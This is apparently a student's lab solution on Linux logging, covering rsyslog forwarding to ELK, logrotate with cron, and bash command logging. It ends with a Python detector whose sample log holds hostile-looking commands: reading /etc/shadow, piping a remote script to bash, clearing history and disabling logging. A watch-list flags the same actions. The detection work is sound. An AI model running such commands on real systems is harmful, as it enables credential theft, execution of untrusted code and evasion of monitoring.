Lab9 Solution Amirlan Sharipov (BS21-CS-01)
1. Question 1
I would use rsyslog and journald on the hosts, forward the logs (over TCP with TLS rather than plain UDP, so that nothing is lost or tampered with in transit) to an ELK stack (Elasticsearch, Logstash, Kibana) and use it as the SIEM. Many people are familiar with the ELK stack, and it is easy to scale.
2. Question 2
> sudo cat /etc/rsyslog.d/auth-errors.conf
auth.alert,authpriv.alert    /var/log/auth-errors

This is equivalent to the shorter form auth,authpriv.alert (a comma joins facilities that share one priority). Note that a selector priority matches that priority and everything more severe, so .alert captures only alert and emerg; if "errors" means err and above, use auth,authpriv.err instead. rsyslog has to be restarted (sudo systemctl restart rsyslog) for the new file to take effect.
3. Question 3
cat /etc/logrotate.d/httpd
/var/log/httpd/*log {
    rotate 10
    compress
    missingok
    sharedscripts
    postrotate
        /usr/bin/systemctl reload httpd.service 2>/dev/null || true
    endscript
}

Cron entry (root's crontab) that runs it every 6 hours:
0 */6 * * * /usr/sbin/logrotate /etc/logrotate.d/httpd

The minute field must be 0, not *; with "* */6 * * *" the job would run every minute during hours 0, 6, 12 and 18. The full path is used because cron runs with a minimal PATH. The config file sets no daily/weekly/size criterion of its own, so the rotation interval is whatever the cron schedule is; sharedscripts makes the reload run once for all matched files rather than once per file.
4. Question 4
5. Question 5
in /etc/bashrc:
export PROMPT_COMMAND='RETRN_VAL=$?;logger -p local6.debug "$(whoami) [$$]: $(history 1 | sed "s/^[ ]*[0-9]\+[ ]*//" ) [$RETRN_VAL]"'

in /etc/rsyslog.d/bash.conf:
local6.*    /var/log/commands.log

PROMPT_COMMAND runs before each prompt is drawn, so every command is logged (with the shell's PID and its exit status, RETRN_VAL) right after it finishes; the sed strips the history entry number. This is an accountability aid, not a security control: a user can run unset PROMPT_COMMAND, start bash --norc, switch to another shell, or turn off history (set +o history), and none of those commands will be logged. For tamper-resistant command logging use auditd execve rules, and ship /var/log/commands.log off the host as in Question 1.
Taken from https://unix.stackexchange.com/questions/664581/how-do-i-log-all-commands-executed-by-all-users
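Once the commands land in /var/log/commands.log they are only useful if someone reads them. The following is an added example (not part of the lab solution or of the Stack Exchange answer) that parses lines in the shape rsyslog's default file template writes for the logger call above, "<timestamp> <host> <logger tag>: <whoami> [<shell pid>]: <command>", and flags commands from a small hypothetical watch-list. The log lines and the watch-list are constructed for the example; the last two sample lines show the evasion caveat from above (history cleared, PROMPT_COMMAND unset), which is itself worth an alert because it is the last thing this mechanism will ever see from that shell.

```python
import re
from collections import Counter

# Constructed sample of /var/log/commands.log as written by rsyslog's
# traditional file format for the PROMPT_COMMAND logger call (no [exit] suffix).
SAMPLE_LOG = """\
Mar  3 12:00:01 web1 alice: alice [4120]: ls -la /var/www
Mar  3 12:00:07 web1 alice: alice [4120]: sudo cat /etc/shadow
Mar  3 12:00:09 web1 root: root [4188]: cat /etc/shadow
Mar  3 12:01:30 web1 bob: bob [5310]: curl http://example.invalid/x.sh | bash
Mar  3 12:02:02 web1 bob: bob [5310]: history -c
Mar  3 12:02:05 web1 bob: bob [5310]: unset PROMPT_COMMAND
"""

# timestamp, host, logger tag (the login name), whoami output, shell PID, command
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<tag>[^:]+): (?P<user>\S+) \[(?P<pid>\d+)\]: (?P<cmd>.*)$"
)

# Hypothetical watch-list: (pattern matched against the command, reason).
SUSPICIOUS = [
    (re.compile(r"/etc/shadow"), "credential file access"),
    (re.compile(r"\bhistory -c\b"), "history cleared"),
    (re.compile(r"\bunset PROMPT_COMMAND\b"), "command logging disabled"),
    (re.compile(r"\bcurl\b.*\|\s*(ba)?sh\b"), "remote script piped to shell"),
]


def parse_line(line):
    """Return a dict for one log line, or None if it is not in the expected shape."""
    m = LINE_RE.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["pid"] = int(event["pid"])
    return event


def parse_log(text):
    """Parse every well-formed line; malformed lines are skipped, not fatal."""
    return [e for e in (parse_line(l) for l in text.splitlines()) if e]


def flag_events(events):
    """Return (user, pid, reason, command) for every command hitting the watch-list."""
    alerts = []
    for e in events:
        for pattern, reason in SUSPICIOUS:
            if pattern.search(e["cmd"]):
                alerts.append((e["user"], e["pid"], reason, e["cmd"]))
    return alerts


def commands_per_user(events):
    """Simple volume baseline: how many commands each user ran."""
    return Counter(e["user"] for e in events)


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    for alert in flag_events(events):
        print(alert)
    print(dict(commands_per_user(events)))
```

In a real deployment the same parser would sit in the ELK pipeline from Question 1 (a Logstash grok pattern equivalent to LINE_RE) rather than in a script on the host, so that a user who can clear the local log cannot also clear the evidence.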